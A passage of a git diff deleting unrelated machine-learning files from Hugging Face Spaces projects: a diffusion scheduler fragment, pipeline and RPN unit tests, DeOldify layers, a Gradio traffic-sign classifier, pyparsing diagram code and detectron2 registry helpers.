(`torch.FloatTensor` or `np.ndarray`): TODO - derivative (`torch.FloatTensor` or `np.ndarray`): TODO - return_dict (`bool`): option for returning tuple rather than FlaxKarrasVeOutput class - - Returns: - prev_sample (TODO): updated sample in the diffusion chain. derivative (TODO): TODO - - """ - pred_original_sample = sample_prev + sigma_prev * model_output - derivative_corr = (sample_prev - pred_original_sample) / sigma_prev - sample_prev = sample_hat + (sigma_prev - sigma_hat) * (0.5 * derivative + 0.5 * derivative_corr) - - if not return_dict: - return (sample_prev, derivative, state) - - return FlaxKarrasVeOutput(prev_sample=sample_prev, derivative=derivative, state=state) - - def add_noise(self, state: KarrasVeSchedulerState, original_samples, noise, timesteps): - raise NotImplementedError() diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py deleted file mode 100644 index 961a22675f33442270751b04da290992d57ed23a..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/pipelines/deepfloyd_if/test_if_inpainting_superresolution.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import random -import unittest - -import torch - -from diffusers import IFInpaintingSuperResolutionPipeline -from diffusers.utils import floats_tensor -from diffusers.utils.import_utils import is_xformers_available -from diffusers.utils.testing_utils import skip_mps, torch_device - -from ..pipeline_params import ( - TEXT_GUIDED_IMAGE_INPAINTING_BATCH_PARAMS, - TEXT_GUIDED_IMAGE_INPAINTING_PARAMS, -) -from ..test_pipelines_common import PipelineTesterMixin -from . import IFPipelineTesterMixin - - -@skip_mps -class IFInpaintingSuperResolutionPipelineFastTests(PipelineTesterMixin, IFPipelineTesterMixin, unittest.TestCase): - pipeline_class = IFInpaintingSuperResolutionPipeline - params = TEXT_GUIDED_IMAGE_INPAINTING_PARAMS - {"width", "height"} - batch_params = TEXT_GUIDED_IMAGE_INPAINTING_BATCH_PARAMS.union({"original_image"}) - required_optional_params = PipelineTesterMixin.required_optional_params - {"latents"} - - def get_dummy_components(self): - return self._get_superresolution_dummy_components() - - def get_dummy_inputs(self, device, seed=0): - if str(device).startswith("mps"): - generator = torch.manual_seed(seed) - else: - generator = torch.Generator(device=device).manual_seed(seed) - - image = floats_tensor((1, 3, 16, 16), rng=random.Random(seed)).to(device) - original_image = floats_tensor((1, 3, 32, 32), rng=random.Random(seed)).to(device) - mask_image = floats_tensor((1, 3, 32, 32), rng=random.Random(seed)).to(device) - - inputs = { - "prompt": "A painting of a squirrel eating a burger", - "image": image, - "original_image": original_image, - "mask_image": mask_image, - "generator": generator, - "num_inference_steps": 2, - "output_type": "numpy", - } - - return inputs - - @unittest.skipIf( - torch_device != "cuda" or not is_xformers_available(), - reason="XFormers attention is only available with CUDA and `xformers` installed", - ) - def test_xformers_attention_forwardGenerator_pass(self): - self._test_xformers_attention_forwardGenerator_pass(expected_max_diff=1e-3) - - def test_save_load_optional_components(self): - self._test_save_load_optional_components() - - @unittest.skipIf(torch_device != "cuda", reason="float16 requires CUDA") - def test_save_load_float16(self): - # Due to non-determinism in save load of the hf-internal-testing/tiny-random-t5 text encoder - super().test_save_load_float16(expected_max_diff=1e-1) - - def test_attention_slicing_forward_pass(self): - self._test_attention_slicing_forward_pass(expected_max_diff=1e-2) - - def test_save_load_local(self): - self._test_save_load_local() - - def test_inference_batch_single_identical(self): - self._test_inference_batch_single_identical( - expected_max_diff=1e-2, - ) diff --git a/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py b/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py deleted file mode 100644 index b7533c90888a66b14361666ec5ae6b5d05a9eb8f..0000000000000000000000000000000000000000 --- a/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py +++ /dev/null @@ -1,48 +0,0 @@ -from fastai.layers import * -from fastai.torch_core import * -from torch.nn.parameter import Parameter -from torch.autograd import Variable - - -# The code below is meant to be merged into fastaiv1 ideally - - -def custom_conv_layer( - ni: int, - nf: int, - ks: int = 3, - stride: int = 1, - padding: int = None, - bias: bool = None, - is_1d: bool = False, - norm_type: Optional[NormType] = NormType.Batch, - use_activ: bool = True, - leaky: float = None, - transpose: bool = False, - init: Callable = nn.init.kaiming_normal_, - self_attention: bool = False, - extra_bn: bool = False, -): - "Create a sequence of convolutional (`ni` to `nf`), ReLU (if `use_activ`) and batchnorm (if `bn`) layers." - if padding is None: - padding = (ks - 1) // 2 if not transpose else 0 - bn = norm_type in (NormType.Batch, NormType.BatchZero) or extra_bn == True - if bias is None: - bias = not bn - conv_func = nn.ConvTranspose2d if transpose else nn.Conv1d if is_1d else nn.Conv2d - conv = init_default( - conv_func(ni, nf, kernel_size=ks, bias=bias, stride=stride, padding=padding), - init, - ) - if norm_type == NormType.Weight: - conv = weight_norm(conv) - elif norm_type == NormType.Spectral: - conv = spectral_norm(conv) - layers = [conv] - if use_activ: - layers.append(relu(True, leaky=leaky)) - if bn: - layers.append((nn.BatchNorm1d if is_1d else nn.BatchNorm2d)(nf)) - if self_attention: - layers.append(SelfAttention(nf)) - return nn.Sequential(*layers) diff --git a/spaces/Aristo/trafficsign/app.py b/spaces/Aristo/trafficsign/app.py deleted file mode 100644 index 8bceb18cd893ce3bb4e8faa49ae50b081c78fbbc..0000000000000000000000000000000000000000 --- a/spaces/Aristo/trafficsign/app.py +++ /dev/null @@ -1,39 +0,0 @@ -import gradio as gr -import PIL -import numpy -import matplotlib.pyplot as plt -#load the trained model to classify sign -from keras.models import load_model -model = load_model('traffic_classifier.h5') -#dictionary to label all traffic signs class. -classes = { 1:'Speed limit (20km/h)', - 2:'Speed limit (30km/h)', - 3:'Speed limit (50km/h)', - 4:'Speed limit (60km/h)', - 5:'Speed limit (70km/h)', - 6:'Speed limit (80km/h)', - 7:'End of speed limit (80km/h)', - 8:'Speed limit (100km/h)', - 9:'Speed limit (120km/h)', - 10:'Veh > 3.5 tons prohibited', - 11:'Bumpy road', - 12:'Slippery road', - 13:'Road narrows on the right', - 14:'Road work', - 15:'Pedestrians', - 16:'Turn right ahead', - 17:'Turn left ahead', - 18:'Ahead only', - 19:'Go straight or right', - 20:'Go straight or left', - 21:'Keep right', - 22:'Keep left', - 23:'Roundabout mandatory'} -#initialise GUI -def predict(img): - img = numpy.expand_dims(img, axis=0) - predict_x = model.predict(img) - pred = numpy.argmax(predict_x, axis = 1) - sign = classes[pred[0]+1] - return sign -gr.Interface(fn= predict, inputs = gr.inputs.Image(shape = (30,30)), outputs= "textbox" ).launch(share=True, debug = True) \ No newline at end of file diff --git a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py b/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py deleted file mode 100644 index 898644755cbbf9a8d4df562663114a7eb7e11fd1..0000000000000000000000000000000000000000 --- a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py +++ /dev/null @@ -1,642 +0,0 @@ -import railroad -import pyparsing -import typing -from typing import ( - List, - NamedTuple, - Generic, - TypeVar, - Dict, - Callable, - Set, - Iterable, -) -from jinja2 import Template -from io import StringIO -import inspect - - -jinja2_template_source = """\ - - - - {% if not head %} - - {% else %} - {{ head | safe }} - {% endif %} - - -{{ body | safe }} -{% for diagram in diagrams %} -
-

{{ diagram.title }}

-
{{ diagram.text }}
-
- {{ diagram.svg }} -
-
-{% endfor %} - - -""" - -template = Template(jinja2_template_source) - -# Note: ideally this would be a dataclass, but we're supporting Python 3.5+ so we can't do this yet -NamedDiagram = NamedTuple( - "NamedDiagram", - [("name", str), ("diagram", typing.Optional[railroad.DiagramItem]), ("index", int)], -) -""" -A simple structure for associating a name with a railroad diagram -""" - -T = TypeVar("T") - - -class EachItem(railroad.Group): - """ - Custom railroad item to compose a: - - Group containing a - - OneOrMore containing a - - Choice of the elements in the Each - with the group label indicating that all must be matched - """ - - all_label = "[ALL]" - - def __init__(self, *items): - choice_item = railroad.Choice(len(items) - 1, *items) - one_or_more_item = railroad.OneOrMore(item=choice_item) - super().__init__(one_or_more_item, label=self.all_label) - - -class AnnotatedItem(railroad.Group): - """ - Simple subclass of Group that creates an annotation label - """ - - def __init__(self, label: str, item): - super().__init__(item=item, label="[{}]".format(label) if label else label) - - -class EditablePartial(Generic[T]): - """ - Acts like a functools.partial, but can be edited. In other words, it represents a type that hasn't yet been - constructed. - """ - - # We need this here because the railroad constructors actually transform the data, so can't be called until the - # entire tree is assembled - - def __init__(self, func: Callable[..., T], args: list, kwargs: dict): - self.func = func - self.args = args - self.kwargs = kwargs - - @classmethod - def from_call(cls, func: Callable[..., T], *args, **kwargs) -> "EditablePartial[T]": - """ - If you call this function in the same way that you would call the constructor, it will store the arguments - as you expect. For example EditablePartial.from_call(Fraction, 1, 3)() == Fraction(1, 3) - """ - return EditablePartial(func=func, args=list(args), kwargs=kwargs) - - @property - def name(self): - return self.kwargs["name"] - - def __call__(self) -> T: - """ - Evaluate the partial and return the result - """ - args = self.args.copy() - kwargs = self.kwargs.copy() - - # This is a helpful hack to allow you to specify varargs parameters (e.g. *args) as keyword args (e.g. - # args=['list', 'of', 'things']) - arg_spec = inspect.getfullargspec(self.func) - if arg_spec.varargs in self.kwargs: - args += kwargs.pop(arg_spec.varargs) - - return self.func(*args, **kwargs) - - -def railroad_to_html(diagrams: List[NamedDiagram], **kwargs) -> str: - """ - Given a list of NamedDiagram, produce a single HTML string that visualises those diagrams - :params kwargs: kwargs to be passed in to the template - """ - data = [] - for diagram in diagrams: - if diagram.diagram is None: - continue - io = StringIO() - diagram.diagram.writeSvg(io.write) - title = diagram.name - if diagram.index == 0: - title += " (root)" - data.append({"title": title, "text": "", "svg": io.getvalue()}) - - return template.render(diagrams=data, **kwargs) - - -def resolve_partial(partial: "EditablePartial[T]") -> T: - """ - Recursively resolves a collection of Partials into whatever type they are - """ - if isinstance(partial, EditablePartial): - partial.args = resolve_partial(partial.args) - partial.kwargs = resolve_partial(partial.kwargs) - return partial() - elif isinstance(partial, list): - return [resolve_partial(x) for x in partial] - elif isinstance(partial, dict): - return {key: resolve_partial(x) for key, x in partial.items()} - else: - return partial - - -def to_railroad( - element: pyparsing.ParserElement, - diagram_kwargs: typing.Optional[dict] = None, - vertical: int = 3, - show_results_names: bool = False, - show_groups: bool = False, -) -> List[NamedDiagram]: - """ - Convert a pyparsing element tree into a list of diagrams. This is the recommended entrypoint to diagram - creation if you want to access the Railroad tree before it is converted to HTML - :param element: base element of the parser being diagrammed - :param diagram_kwargs: kwargs to pass to the Diagram() constructor - :param vertical: (optional) - int - limit at which number of alternatives should be - shown vertically instead of horizontally - :param show_results_names - bool to indicate whether results name annotations should be - included in the diagram - :param show_groups - bool to indicate whether groups should be highlighted with an unlabeled - surrounding box - """ - # Convert the whole tree underneath the root - lookup = ConverterState(diagram_kwargs=diagram_kwargs or {}) - _to_diagram_element( - element, - lookup=lookup, - parent=None, - vertical=vertical, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - root_id = id(element) - # Convert the root if it hasn't been already - if root_id in lookup: - if not element.customName: - lookup[root_id].name = "" - lookup[root_id].mark_for_extraction(root_id, lookup, force=True) - - # Now that we're finished, we can convert from intermediate structures into Railroad elements - diags = list(lookup.diagrams.values()) - if len(diags) > 1: - # collapse out duplicate diags with the same name - seen = set() - deduped_diags = [] - for d in diags: - # don't extract SkipTo elements, they are uninformative as subdiagrams - if d.name == "...": - continue - if d.name is not None and d.name not in seen: - seen.add(d.name) - deduped_diags.append(d) - resolved = [resolve_partial(partial) for partial in deduped_diags] - else: - # special case - if just one diagram, always display it, even if - # it has no name - resolved = [resolve_partial(partial) for partial in diags] - return sorted(resolved, key=lambda diag: diag.index) - - -def _should_vertical( - specification: int, exprs: Iterable[pyparsing.ParserElement] -) -> bool: - """ - Returns true if we should return a vertical list of elements - """ - if specification is None: - return False - else: - return len(_visible_exprs(exprs)) >= specification - - -class ElementState: - """ - State recorded for an individual pyparsing Element - """ - - # Note: this should be a dataclass, but we have to support Python 3.5 - def __init__( - self, - element: pyparsing.ParserElement, - converted: EditablePartial, - parent: EditablePartial, - number: int, - name: str = None, - parent_index: typing.Optional[int] = None, - ): - #: The pyparsing element that this represents - self.element: pyparsing.ParserElement = element - #: The name of the element - self.name: typing.Optional[str] = name - #: The output Railroad element in an unconverted state - self.converted: EditablePartial = converted - #: The parent Railroad element, which we store so that we can extract this if it's duplicated - self.parent: EditablePartial = parent - #: The order in which we found this element, used for sorting diagrams if this is extracted into a diagram - self.number: int = number - #: The index of this inside its parent - self.parent_index: typing.Optional[int] = parent_index - #: If true, we should extract this out into a subdiagram - self.extract: bool = False - #: If true, all of this element's children have been filled out - self.complete: bool = False - - def mark_for_extraction( - self, el_id: int, state: "ConverterState", name: str = None, force: bool = False - ): - """ - Called when this instance has been seen twice, and thus should eventually be extracted into a sub-diagram - :param el_id: id of the element - :param state: element/diagram state tracker - :param name: name to use for this element's text - :param force: If true, force extraction now, regardless of the state of this. Only useful for extracting the - root element when we know we're finished - """ - self.extract = True - - # Set the name - if not self.name: - if name: - # Allow forcing a custom name - self.name = name - elif self.element.customName: - self.name = self.element.customName - else: - self.name = "" - - # Just because this is marked for extraction doesn't mean we can do it yet. We may have to wait for children - # to be added - # Also, if this is just a string literal etc, don't bother extracting it - if force or (self.complete and _worth_extracting(self.element)): - state.extract_into_diagram(el_id) - - -class ConverterState: - """ - Stores some state that persists between recursions into the element tree - """ - - def __init__(self, diagram_kwargs: typing.Optional[dict] = None): - #: A dictionary mapping ParserElements to state relating to them - self._element_diagram_states: Dict[int, ElementState] = {} - #: A dictionary mapping ParserElement IDs to subdiagrams generated from them - self.diagrams: Dict[int, EditablePartial[NamedDiagram]] = {} - #: The index of the next unnamed element - self.unnamed_index: int = 1 - #: The index of the next element. This is used for sorting - self.index: int = 0 - #: Shared kwargs that are used to customize the construction of diagrams - self.diagram_kwargs: dict = diagram_kwargs or {} - self.extracted_diagram_names: Set[str] = set() - - def __setitem__(self, key: int, value: ElementState): - self._element_diagram_states[key] = value - - def __getitem__(self, key: int) -> ElementState: - return self._element_diagram_states[key] - - def __delitem__(self, key: int): - del self._element_diagram_states[key] - - def __contains__(self, key: int): - return key in self._element_diagram_states - - def generate_unnamed(self) -> int: - """ - Generate a number used in the name of an otherwise unnamed diagram - """ - self.unnamed_index += 1 - return self.unnamed_index - - def generate_index(self) -> int: - """ - Generate a number used to index a diagram - """ - self.index += 1 - return self.index - - def extract_into_diagram(self, el_id: int): - """ - Used when we encounter the same token twice in the same tree. When this - happens, we replace all instances of that token with a terminal, and - create a new subdiagram for the token - """ - position = self[el_id] - - # Replace the original definition of this element with a regular block - if position.parent: - ret = EditablePartial.from_call(railroad.NonTerminal, text=position.name) - if "item" in position.parent.kwargs: - position.parent.kwargs["item"] = ret - elif "items" in position.parent.kwargs: - position.parent.kwargs["items"][position.parent_index] = ret - - # If the element we're extracting is a group, skip to its content but keep the title - if position.converted.func == railroad.Group: - content = position.converted.kwargs["item"] - else: - content = position.converted - - self.diagrams[el_id] = EditablePartial.from_call( - NamedDiagram, - name=position.name, - diagram=EditablePartial.from_call( - railroad.Diagram, content, **self.diagram_kwargs - ), - index=position.number, - ) - - del self[el_id] - - -def _worth_extracting(element: pyparsing.ParserElement) -> bool: - """ - Returns true if this element is worth having its own sub-diagram. Simply, if any of its children - themselves have children, then its complex enough to extract - """ - children = element.recurse() - return any(child.recurse() for child in children) - - -def _apply_diagram_item_enhancements(fn): - """ - decorator to ensure enhancements to a diagram item (such as results name annotations) - get applied on return from _to_diagram_element (we do this since there are several - returns in _to_diagram_element) - """ - - def _inner( - element: pyparsing.ParserElement, - parent: typing.Optional[EditablePartial], - lookup: ConverterState = None, - vertical: int = None, - index: int = 0, - name_hint: str = None, - show_results_names: bool = False, - show_groups: bool = False, - ) -> typing.Optional[EditablePartial]: - - ret = fn( - element, - parent, - lookup, - vertical, - index, - name_hint, - show_results_names, - show_groups, - ) - - # apply annotation for results name, if present - if show_results_names and ret is not None: - element_results_name = element.resultsName - if element_results_name: - # add "*" to indicate if this is a "list all results" name - element_results_name += "" if element.modalResults else "*" - ret = EditablePartial.from_call( - railroad.Group, item=ret, label=element_results_name - ) - - return ret - - return _inner - - -def _visible_exprs(exprs: Iterable[pyparsing.ParserElement]): - non_diagramming_exprs = ( - pyparsing.ParseElementEnhance, - pyparsing.PositionToken, - pyparsing.And._ErrorStop, - ) - return [ - e - for e in exprs - if not (e.customName or e.resultsName or isinstance(e, non_diagramming_exprs)) - ] - - -@_apply_diagram_item_enhancements -def _to_diagram_element( - element: pyparsing.ParserElement, - parent: typing.Optional[EditablePartial], - lookup: ConverterState = None, - vertical: int = None, - index: int = 0, - name_hint: str = None, - show_results_names: bool = False, - show_groups: bool = False, -) -> typing.Optional[EditablePartial]: - """ - Recursively converts a PyParsing Element to a railroad Element - :param lookup: The shared converter state that keeps track of useful things - :param index: The index of this element within the parent - :param parent: The parent of this element in the output tree - :param vertical: Controls at what point we make a list of elements vertical. If this is an integer (the default), - it sets the threshold of the number of items before we go vertical. If True, always go vertical, if False, never - do so - :param name_hint: If provided, this will override the generated name - :param show_results_names: bool flag indicating whether to add annotations for results names - :returns: The converted version of the input element, but as a Partial that hasn't yet been constructed - :param show_groups: bool flag indicating whether to show groups using bounding box - """ - exprs = element.recurse() - name = name_hint or element.customName or element.__class__.__name__ - - # Python's id() is used to provide a unique identifier for elements - el_id = id(element) - - element_results_name = element.resultsName - - # Here we basically bypass processing certain wrapper elements if they contribute nothing to the diagram - if not element.customName: - if isinstance( - element, - ( - # pyparsing.TokenConverter, - # pyparsing.Forward, - pyparsing.Located, - ), - ): - # However, if this element has a useful custom name, and its child does not, we can pass it on to the child - if exprs: - if not exprs[0].customName: - propagated_name = name - else: - propagated_name = None - - return _to_diagram_element( - element.expr, - parent=parent, - lookup=lookup, - vertical=vertical, - index=index, - name_hint=propagated_name, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - # If the element isn't worth extracting, we always treat it as the first time we say it - if _worth_extracting(element): - if el_id in lookup: - # If we've seen this element exactly once before, we are only just now finding out that it's a duplicate, - # so we have to extract it into a new diagram. - looked_up = lookup[el_id] - looked_up.mark_for_extraction(el_id, lookup, name=name_hint) - ret = EditablePartial.from_call(railroad.NonTerminal, text=looked_up.name) - return ret - - elif el_id in lookup.diagrams: - # If we have seen the element at least twice before, and have already extracted it into a subdiagram, we - # just put in a marker element that refers to the sub-diagram - ret = EditablePartial.from_call( - railroad.NonTerminal, text=lookup.diagrams[el_id].kwargs["name"] - ) - return ret - - # Recursively convert child elements - # Here we find the most relevant Railroad element for matching pyparsing Element - # We use ``items=[]`` here to hold the place for where the child elements will go once created - if isinstance(element, pyparsing.And): - # detect And's created with ``expr*N`` notation - for these use a OneOrMore with a repeat - # (all will have the same name, and resultsName) - if not exprs: - return None - if len(set((e.name, e.resultsName) for e in exprs)) == 1: - ret = EditablePartial.from_call( - railroad.OneOrMore, item="", repeat=str(len(exprs)) - ) - elif _should_vertical(vertical, exprs): - ret = EditablePartial.from_call(railroad.Stack, items=[]) - else: - ret = EditablePartial.from_call(railroad.Sequence, items=[]) - elif isinstance(element, (pyparsing.Or, pyparsing.MatchFirst)): - if not exprs: - return None - if _should_vertical(vertical, exprs): - ret = EditablePartial.from_call(railroad.Choice, 0, items=[]) - else: - ret = EditablePartial.from_call(railroad.HorizontalChoice, items=[]) - elif isinstance(element, pyparsing.Each): - if not exprs: - return None - ret = EditablePartial.from_call(EachItem, items=[]) - elif isinstance(element, pyparsing.NotAny): - ret = EditablePartial.from_call(AnnotatedItem, label="NOT", item="") - elif isinstance(element, pyparsing.FollowedBy): - ret = EditablePartial.from_call(AnnotatedItem, label="LOOKAHEAD", item="") - elif isinstance(element, pyparsing.PrecededBy): - ret = EditablePartial.from_call(AnnotatedItem, label="LOOKBEHIND", item="") - elif isinstance(element, pyparsing.Group): - if show_groups: - ret = EditablePartial.from_call(AnnotatedItem, label="", item="") - else: - ret = EditablePartial.from_call(railroad.Group, label="", item="") - elif isinstance(element, pyparsing.TokenConverter): - ret = EditablePartial.from_call( - AnnotatedItem, label=type(element).__name__.lower(), item="" - ) - elif isinstance(element, pyparsing.Opt): - ret = EditablePartial.from_call(railroad.Optional, item="") - elif isinstance(element, pyparsing.OneOrMore): - ret = EditablePartial.from_call(railroad.OneOrMore, item="") - elif isinstance(element, pyparsing.ZeroOrMore): - ret = EditablePartial.from_call(railroad.ZeroOrMore, item="") - elif isinstance(element, pyparsing.Group): - ret = EditablePartial.from_call( - railroad.Group, item=None, label=element_results_name - ) - elif isinstance(element, pyparsing.Empty) and not element.customName: - # Skip unnamed "Empty" elements - ret = None - elif len(exprs) > 1: - ret = EditablePartial.from_call(railroad.Sequence, items=[]) - elif len(exprs) > 0 and not element_results_name: - ret = EditablePartial.from_call(railroad.Group, item="", label=name) - else: - terminal = EditablePartial.from_call(railroad.Terminal, element.defaultName) - ret = terminal - - if ret is None: - return - - # Indicate this element's position in the tree so we can extract it if necessary - lookup[el_id] = ElementState( - element=element, - converted=ret, - parent=parent, - parent_index=index, - number=lookup.generate_index(), - ) - if element.customName: - lookup[el_id].mark_for_extraction(el_id, lookup, element.customName) - - i = 0 - for expr in exprs: - # Add a placeholder index in case we have to extract the child before we even add it to the parent - if "items" in ret.kwargs: - ret.kwargs["items"].insert(i, None) - - item = _to_diagram_element( - expr, - parent=ret, - lookup=lookup, - vertical=vertical, - index=i, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - # Some elements don't need to be shown in the diagram - if item is not None: - if "item" in ret.kwargs: - ret.kwargs["item"] = item - elif "items" in ret.kwargs: - # If we've already extracted the child, don't touch this index, since it's occupied by a nonterminal - ret.kwargs["items"][i] = item - i += 1 - elif "items" in ret.kwargs: - # If we're supposed to skip this element, remove it from the parent - del ret.kwargs["items"][i] - - # If all this items children are none, skip this item - if ret and ( - ("items" in ret.kwargs and len(ret.kwargs["items"]) == 0) - or ("item" in ret.kwargs and ret.kwargs["item"] is None) - ): - ret = EditablePartial.from_call(railroad.Terminal, name) - - # Mark this element as "complete", ie it has all of its children - if el_id in lookup: - lookup[el_id].complete = True - - if el_id in lookup and lookup[el_id].extract and lookup[el_id].complete: - lookup.extract_into_diagram(el_id) - if ret is not None: - ret = EditablePartial.from_call( - railroad.NonTerminal, text=lookup.diagrams[el_id].kwargs["name"] - ) - - return ret diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py deleted file mode 100644 index 4b01e9007c2578a7b5ae555c926cc06c8a3010f9..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py +++ /dev/null @@ -1,60 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -from typing import Any -import pydoc -from fvcore.common.registry import Registry # for backward compatibility. - -""" -``Registry`` and `locate` provide ways to map a string (typically found -in config files) to callable objects. -""" - -__all__ = ["Registry", "locate"] - - -def _convert_target_to_string(t: Any) -> str: - """ - Inverse of ``locate()``. - - Args: - t: any object with ``__module__`` and ``__qualname__`` - """ - module, qualname = t.__module__, t.__qualname__ - - # Compress the path to this object, e.g. ``module.submodule._impl.class`` - # may become ``module.submodule.class``, if the later also resolves to the same - # object. This simplifies the string, and also is less affected by moving the - # class implementation. - module_parts = module.split(".") - for k in range(1, len(module_parts)): - prefix = ".".join(module_parts[:k]) - candidate = f"{prefix}.{qualname}" - try: - if locate(candidate) is t: - return candidate - except ImportError: - pass - return f"{module}.{qualname}" - - -def locate(name: str) -> Any: - """ - Locate and return an object ``x`` using an input string ``{x.__module__}.{x.__qualname__}``, - such as "module.submodule.class_name". - - Raise Exception if it cannot be found. - """ - obj = pydoc.locate(name) - - # Some cases (e.g. torch.optim.sgd.SGD) not handled correctly - # by pydoc.locate. Try a private function from hydra. - if obj is None: - try: - # from hydra.utils import get_method - will print many errors - from hydra.utils import _locate - except ImportError as e: - raise ImportError(f"Cannot dynamically locate object {name}!") from e - else: - obj = _locate(name) # it raises if fails - - return obj diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py deleted file mode 100644 index f14faae56e580d3d4762d31273b9f65c5774346b..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py +++ /dev/null @@ -1,262 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import unittest -import torch - -from detectron2.config import get_cfg -from detectron2.export import scripting_with_instances -from detectron2.layers import ShapeSpec -from detectron2.modeling.backbone import build_backbone -from detectron2.modeling.proposal_generator import RPN, build_proposal_generator -from detectron2.modeling.proposal_generator.proposal_utils import ( - add_ground_truth_to_proposals, - find_top_rpn_proposals, -) -from detectron2.structures import Boxes, ImageList, Instances, RotatedBoxes -from detectron2.utils.events import EventStorage - -logger = logging.getLogger(__name__) - - -class RPNTest(unittest.TestCase): - def get_gt_and_features(self): - num_images = 2 - images_tensor = torch.rand(num_images, 20, 30) - image_sizes = [(10, 10), (20, 30)] - images = ImageList(images_tensor, image_sizes) - image_shape = (15, 15) - num_channels = 1024 - features = {"res4": torch.rand(num_images, num_channels, 1, 2)} - gt_boxes = torch.tensor([[1, 1, 3, 3], [2, 2, 6, 6]], dtype=torch.float32) - gt_instances = Instances(image_shape) - gt_instances.gt_boxes = Boxes(gt_boxes) - return (gt_instances, features, images, image_sizes) - - def test_rpn(self): - torch.manual_seed(121) - cfg = get_cfg() - backbone = build_backbone(cfg) - proposal_generator = RPN(cfg, backbone.output_shape()) - (gt_instances, features, images, image_sizes) = self.get_gt_and_features() - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - - expected_losses = { - "loss_rpn_cls": torch.tensor(0.08011703193), - "loss_rpn_loc": torch.tensor(0.101470276), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - self.assertEqual(len(proposals), len(image_sizes)) - for proposal, im_size in zip(proposals, image_sizes): - self.assertEqual(proposal.image_size, im_size) - - expected_proposal_box = torch.tensor([[0, 0, 10, 10], [7.2702, 0, 10, 10]]) - expected_objectness_logit = torch.tensor([0.1596, -0.0007]) - self.assertTrue( - torch.allclose(proposals[0].proposal_boxes.tensor, expected_proposal_box, atol=1e-4) - ) - self.assertTrue( - torch.allclose(proposals[0].objectness_logits, expected_objectness_logit, atol=1e-4) - ) - - def verify_rpn(self, conv_dims, expected_conv_dims): - torch.manual_seed(121) - cfg = get_cfg() - cfg.MODEL.RPN.CONV_DIMS = conv_dims - backbone = build_backbone(cfg) - proposal_generator = RPN(cfg, backbone.output_shape()) - for k, conv in enumerate(proposal_generator.rpn_head.conv): - self.assertEqual(expected_conv_dims[k], conv.out_channels) - return proposal_generator - - def test_rpn_larger_num_convs(self): - conv_dims = [64, 64, 64, 64, 64] - proposal_generator = self.verify_rpn(conv_dims, conv_dims) - (gt_instances, features, images, image_sizes) = self.get_gt_and_features() - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - expected_losses = { - "loss_rpn_cls": torch.tensor(0.08122821152), - "loss_rpn_loc": torch.tensor(0.10064548254), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - def test_rpn_conv_dims_not_set(self): - conv_dims = [-1, -1, -1] - expected_conv_dims = [1024, 1024, 1024] - self.verify_rpn(conv_dims, expected_conv_dims) - - def test_rpn_scriptability(self): - cfg = get_cfg() - proposal_generator = RPN(cfg, {"res4": ShapeSpec(channels=1024, stride=16)}).eval() - num_images = 2 - images_tensor = torch.rand(num_images, 30, 40) - image_sizes = [(32, 32), (30, 40)] - images = ImageList(images_tensor, image_sizes) - features = {"res4": torch.rand(num_images, 1024, 1, 2)} - - fields = {"proposal_boxes": Boxes, "objectness_logits": torch.Tensor} - proposal_generator_ts = scripting_with_instances(proposal_generator, fields) - - proposals, _ = proposal_generator(images, features) - proposals_ts, _ = proposal_generator_ts(images, features) - - for proposal, proposal_ts in zip(proposals, proposals_ts): - self.assertEqual(proposal.image_size, proposal_ts.image_size) - self.assertTrue( - torch.equal(proposal.proposal_boxes.tensor, proposal_ts.proposal_boxes.tensor) - ) - self.assertTrue(torch.equal(proposal.objectness_logits, proposal_ts.objectness_logits)) - - def 